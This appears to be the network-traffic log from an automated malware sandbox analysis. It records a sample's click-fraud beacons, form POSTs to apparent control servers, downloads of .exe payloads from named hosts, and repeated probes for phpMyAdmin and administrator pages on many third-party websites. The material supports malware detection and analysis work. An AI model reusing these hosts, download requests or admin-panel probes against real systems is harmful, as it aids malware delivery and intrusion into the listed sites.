                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jsglrnwsogbwk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: humydrole.com
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://myrcnthvpveoo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 47.254.134.152
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 47.254.134.152
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.55.13.50
                                Source: global trafficHTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shpilliwilli.com
                                Source: global trafficHTTP traffic detected: GET /fe59b57390b3eb9c78ef311810f298a4/288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: linkofstrumble.com
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: e-bicycles.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: e-art-studio.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: e-bicycles.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kingsway-hk.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aloeveraforever.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: e-art-studio.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: inhodinky.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: detmar.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: elrocket.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eurisproagro.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: izberatel.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: keramat.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: emmetisportfun.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: elteconline.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: erikamoveis.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: emmetisportfun.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: roland-sk.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: elteconline.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: roland-sk.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakupusa.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakupusa.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: magokorokan.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: inhodinky.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
